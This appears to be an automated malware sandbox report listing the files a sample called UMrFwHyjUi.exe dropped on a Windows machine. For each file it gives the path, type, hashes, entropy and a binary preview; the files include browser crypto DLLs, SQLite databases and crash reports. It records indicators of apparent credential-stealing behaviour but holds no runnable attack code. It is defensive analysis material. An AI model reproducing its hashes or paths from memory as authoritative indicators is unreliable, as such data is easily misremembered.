                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\DBFCBGCGIJKJ\IDGHDG

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\DBFCBGCGIJKJ\JDGCFB

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                                                                          Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                          MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                          SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                          SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                          SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\DBFCBGCGIJKJ\JDGCFB-shm

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UMrFwHyjUi.exe_4620a9379d46b73d4d1878cef748ffd82f5873f_e65ae786_64ea4dc4-e5dd-49d1-91dd-0c0c055198fc\Report.wer

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                          Entropy (8bit):0.6550849711192669
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:E4SXFr81BbcosJhozxTMjh6tQXIDcQvc6QcEVcw3cE/P+HbHg/5hZAX/d5FMT2Sw:Eyzbco/80BU/IjhzuiFwZ24IO8Keb
                                                                                                                                                                                                                          MD5:258E64770C64E390DCF325092A6B5B14
                                                                                                                                                                                                                          SHA1:8802ED62CDA01E0C3D6FC6F5B096C3A509B1D7A5
                                                                                                                                                                                                                          SHA-256:ECD989EA3009C8DABC7336020FEA8A1209A7340146B5EA7A692D1BDF02DA4932
                                                                                                                                                                                                                          SHA-512:6A75910B8F9CEA4400361CAE77F67246D4277BC32916B2652F37C47C6EDA92BF90FFDA855B8372015AEC363DF5798EEA5929D98C4C2091E9E31EA14E1FC66F85
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.1.6.9.5.0.1.3.3.4.3.4.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.1.6.9.5.0.1.7.2.4.9.6.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.e.a.4.d.c.4.-.e.5.d.d.-.4.9.d.1.-.9.1.d.d.-.0.c.0.c.0.5.5.1.9.8.f.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.c.c.9.5.5.5.-.8.a.6.6.-.4.9.7.1.-.a.d.d.d.-.5.d.6.9.5.e.2.1.9.7.5.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.M.r.F.w.H.y.j.U.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.e.c.-.0.0.0.1.-.0.0.1.4.-.e.8.5.6.-.a.a.e.d.5.c.2.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.3.e.4.4.c.8.9.c.9.c.4.5.3.e.b.f.f.9.1.5.8.c.4.9.1.f.9.f.a.2.0.0.0.0.0.f.f.f.f.!.0.0.0.0.5.2.3.0.f.e.a.7.4.e.8.c.4.d.e.d.d.a.5.9.c.b.c.d.d.1.3.a.9.b.c.7.a.d.0.3.5.a.c.0.!.U.M.r.F.w.H.y.j.U.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF03C.tmp.dmp

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Wed Oct 23 15:05:01 2024, 0x1205a4 type
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):39598
                                                                                                                                                                                                                          Entropy (8bit):1.7463289539338198
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:jsrCVdWhjcOS8cikHb1rvUKtH4kx4cIyovwcPo:pVYTWik71rvUQH4rcIy2
                                                                                                                                                                                                                          MD5:CFE44BCECD79D23E93C6E636A085E1E5
                                                                                                                                                                                                                          SHA1:2FC12162573F15A4ED5186192C6A3B39790A2A96
                                                                                                                                                                                                                          SHA-256:9A7834D93720AA93B0D6FE3D26923EDE09103C786D8581CD7372F4B7EFF40737
                                                                                                                                                                                                                          SHA-512:338F4895C53F31CBACAF28EF89318250C40F8D4AEE842B23B02C34D01E9CEB745BFDF50FDD0E8C6D908FA1C29967837E70E476973C093744E34061BD5ED807F5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MDMP..a..... ..........g........................d...........t...............T.......8...........T...........................0...........................................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0BA.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):8380
                                                                                                                                                                                                                          Entropy (8bit):3.6949730146202886
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJMakK6l6Y9RSU9ingmfO4QTQeh3prRG89bGqsffim:R6lXJM86l6YLSU9ingmfO4QxPGJfb
                                                                                                                                                                                                                          MD5:2EB52E3EF5A9523759D771B94F7CF25F
                                                                                                                                                                                                                          SHA1:DD942E4DDB2A61E48386A36453D4E1E3E41271C3
                                                                                                                                                                                                                          SHA-256:7B7E1F0849929DB1891EF40B81D693428CB91115D1DA7D67DF4DF00F7C7A61AB
                                                                                                                                                                                                                          SHA-512:BABC19060C3232C8FD62931BBD4A58CDA9B4B060B3E8B80624AF388CDC9588AE1573D44A4FBA09CFECE821E49C4FB9A1B92C0BEBF0D5E1358ACA175671CCB5F3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.0.0.4.<./.P.i.

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF109.tmp.xml

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4696
                                                                                                                                                                                                                          Entropy (8bit):4.473553621479366
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsJJg77aI9+JyvSWpW8VYPYm8M4JFLUFgf+q8vSLO1IvaCDwMdd:uIjfbI7QJyvz7VrJpfK91gaCLdd
                                                                                                                                                                                                                          MD5:8BC546445D22F86EA0194BE38C26D2B5
                                                                                                                                                                                                                          SHA1:599560E6C6345EF2655C99EF2E5DC2E53B4E0B9F
                                                                                                                                                                                                                          SHA-256:96A7CAE43D567EB9C3D849D887AEE58AC1D3917315984057854002642AC5CE24
                                                                                                                                                                                                                          SHA-512:DF4C51601958CCEE24D1CC4F3B4EF628FD8D88D9D5C7445B1313059B52AC11319484FF1794B5168DFBEBD3853876628351A8F6379B19B019B27F757E1EF3C449
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="556207" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                          C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                          • Filename: b157p9L0c1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: PFlJLzFUqH.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: 46QSz6qyKC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: X2lvDxMUmn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: vkkTIT6kcx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                          • Filename: b157p9L0c1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: PFlJLzFUqH.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: 46QSz6qyKC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: X2lvDxMUmn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: vkkTIT6kcx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\nss3.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199786602107[1].htm

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3035), with CRLF, LF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):34570
                                                                                                                                                                                                                          Entropy (8bit):5.400438178825524
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:D5lpqEg8QE2fJoAa1+6u8vAAnTBv++nIjBtPF5zfhkPXo8A5LTBv++nIjBtPF5xG:Nl8Eg8QE2fJoAa1+6u2nTBv++nIjBtPb
                                                                                                                                                                                                                          MD5:AF5DABF9003D72340354D0E146623018
                                                                                                                                                                                                                          SHA1:931FEA5ECEDFAFAE124C5053AF6A0E36B31AEA60
                                                                                                                                                                                                                          SHA-256:9A208641F75EEB7A6DF34836EE00773D2041A66078EEA032FB39EA2BF323045E
                                                                                                                                                                                                                          SHA-512:6125DECD779127A5B8EEC29E5D56864CDBFC8DAC7255FBB8DDE498AE7ED9786704B5AC3CD575B74E9F8F43FA0F58F51F80CBF0FA89F89DCDD2E95704B5FDE535
                                                                                                                                                                                                                          Malicious:false
